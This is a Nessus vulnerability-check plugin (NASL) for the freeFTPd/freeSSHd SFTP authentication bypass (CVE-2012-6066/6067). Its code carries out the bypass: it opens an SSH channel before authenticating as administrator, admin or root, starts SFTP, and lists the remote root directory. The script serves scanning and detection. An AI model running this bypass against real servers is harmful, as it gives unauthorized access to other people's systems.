freeFTPd / freeSSHd SFTP Authentication Bypass

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(63223);
  script_version("1.17");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

  script_cve_id("CVE-2012-6066", "CVE-2012-6067");
  script_bugtraq_id(56782, 56785);
  script_xref(name:"EDB-ID", value:"23079");
  script_xref(name:"EDB-ID", value:"23080");
  script_xref(name:"EDB-ID", value:"24133");

  script_name(english:"freeFTPd / freeSSHd SFTP Authentication Bypass");
  script_summary(english:"Tries to bypass auth and get a dir listing");

  script_set_attribute(attribute:"synopsis", value:
"The SFTP server running on the remote host has an authentication bypass
vulnerability.");
  script_set_attribute(attribute:"description", value:
"The SFTP server included with freeFTPd or freeSSHd has an
authentication bypass vulnerability.  Authentication can be bypassed by
opening an SSH channel before any credentials are provided.  A remote,
unauthenticated attacker could exploit this to login without providing
credentials. 

After logging in, uploading specially crafted files could result in
arbitrary code execution as SYSTEM.  Refer to the researcher's advisory
for more information.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2010/Aug/132");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2012/Dec/10");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2012/Dec/11");
  script_set_attribute(attribute:"solution", value:
"There is no known solution at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:U/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2012-6067");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Freesshd Authentication Bypass');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2010/08/11");
  script_set_attribute(attribute:"plugin_publication_date", value:"2012/12/11");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:freeftpd:freeftpd");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:freesshd:freesshd");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"Gain a shell remotely");

  script_copyright(english:"This script is Copyright (C) 2012-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("ssh_detect.nasl");
  script_exclude_keys("global_settings/supplied_logins_only");
  script_require_ports("Services/ssh", 22);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("ssh_func.inc");
include("ssh_fxp_func.inc");

checking_default_account_dont_report = TRUE;

enable_ssh_wrappers();

if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);

port = get_service(svc:'ssh', default:22, exit_on_fail:TRUE);

# Make sure the SSH service looks like freeFTPd or freeSSHd
if (report_paranoia < 2 && banner = get_kb_item("SSH/banner/" + port))
{
  #    freeFTPd 1.0.11                  freeSSHd 1.2.6
  if ('WeOnlyDo-wodFTPD' >!< banner && '-WeOnlyDo ' >!< banner) audit(AUDIT_NOT_LISTEN, 'freeFTPd/freeSSHd SFTP Server', port);
}

dir = '/'; # dir to get a listing of after bypassing authentication
MAX_DISPLAYED_FILES = 10;
users = make_list(
  'administrator',
  'admin',
  'root'
);
want_reply = (report_paranoia == 0);


foreach user (users)
{
  _ssh_socket = open_sock_tcp(port);
  if (!_ssh_socket) audit(AUDIT_SOCK_FAIL, port);

  # initialization
  init();
  server_version = ssh_exchange_identification();
  if (!server_version)
  {
    ssh_close_connection();
    exit(1, get_ssh_error());
  }

  _ssh_server_version = server_version;

  # key exchange
  ret = ssh_kex2(server_version:server_version, nofingerprint:TRUE);
  if (ret != 0)
  {
    ssh_close_connection();
    exit(1, get_ssh_error());
  }

  if (!ssh_req_svc("ssh-userauth"))
  {
    ssh_close_connection();
    exit(0, "The SSH service listening on port "+port+" does not support 'ssh-userauth'.");
  }

  # We're only going to send the userauth request, not actually log in
  payload =
    putstring(buffer:user) +
    putstring(buffer:"ssh-connection") +
    putstring(buffer:"keyboard-interactive") +
    putstring(buffer:"en-US") +
    putstring(buffer:"");
  send_ssh_packet(code:SSH_MSG_USERAUTH_REQUEST, payload:payload);

  # Check the response for SSH_MSG_USERAUTH_INFO_REQUEST
  res = recv_ssh_packet();
  code = ord(res[0]);
  if(code != SSH_MSG_USERAUTH_INFO_REQUEST)
  {
    ssh_close_connection();
    audit(AUDIT_LISTEN_NOT_VULN, 'SSH', port);
  }

  # we'll only be able to open a channel w/o auth against vulnerable servers
  ret = ssh_open_channel();
  if (ret != 0)
  {
    ssh_close_connection();
    audit(AUDIT_LISTEN_NOT_VULN, 'SSH', port);
  }

  # Check if the subsystem is supported.
  ret = ssh_request_subsystem(subsystem:"sftp", want_reply:want_reply);
  if (!ret)
  {
    ssh_close_connection();
    exit(0, "The SSH service listening on port "+port+" does not support SFTP.");
  }

  # Initialize the connection.
  fxp_protocol_version = 3;

  ssh_fxp_send_packet(type:SSH_FXP_INIT, data:raw_int32(fxp_protocol_version));
  # nb: if the username is not defined in freeSSHd, there will be a
  #     so we don't want to exit.
  res = ssh_fxp_recv_packet(exit_on_fail:FALSE);
  if (isnull(res))
  {
    ssh_close_connection();
    continue;
  }
  if (res['type'] != SSH_FXP_VERSION)
  {
    ssh_close_connection();
    exit(0, "The SSH server listening on port "+port+" responded with a packet type that was " + ord(res['type']) + ", not SSH_FXP_VERSION (" + SSH_FXP_VERSION + ")");
  }

  val = ntol(buffer:res['data'], begin:0);
  if (val != fxp_protocol_version)
  {
    ssh_close_connection();
    exit(0, "The SSH server listening on port "+port+" does not support version " + _ssh_fxp_protocol_version + " of the SFTP protocol; it supports " + val + ".");
  }

  if (report_verbosity > 0)
  {
    report = '\n' + 'Nessus was able to bypass authentication and gain access to the' +
             '\n' + 'following account :' +
                 '\n' +
                 '\n' + '  ' + user;

    listing = ssh_fxp_get_listing(dir:dir, max_files:MAX_DISPLAYED_FILES);
    if (!isnull(listing))
    {
      report += '\n' +
                '\n' + 'And it was able to collect the following listing of \'' + dir + '\' :' +
                '\n';
      foreach file (sort(keys(listing['files'])))
      {
        report += '\n' + '  ' + listing['files'][file];
      }
      if (listing['truncated'])
      {
        report += '\n' +
                  '\n' + 'Note that this listing is incomplete and limited to ' + MAX_DISPLAYED_FILES + ' entries.';
      }
      security_hole(port:port, extra:report);
    }
    else security_hole(port);

    ssh_fxp_close_connection();
    exit(0);
  }
}
ssh_close_connection();
audit(AUDIT_LISTEN_NOT_VULN, "freeFTPd / freeSSHd", port);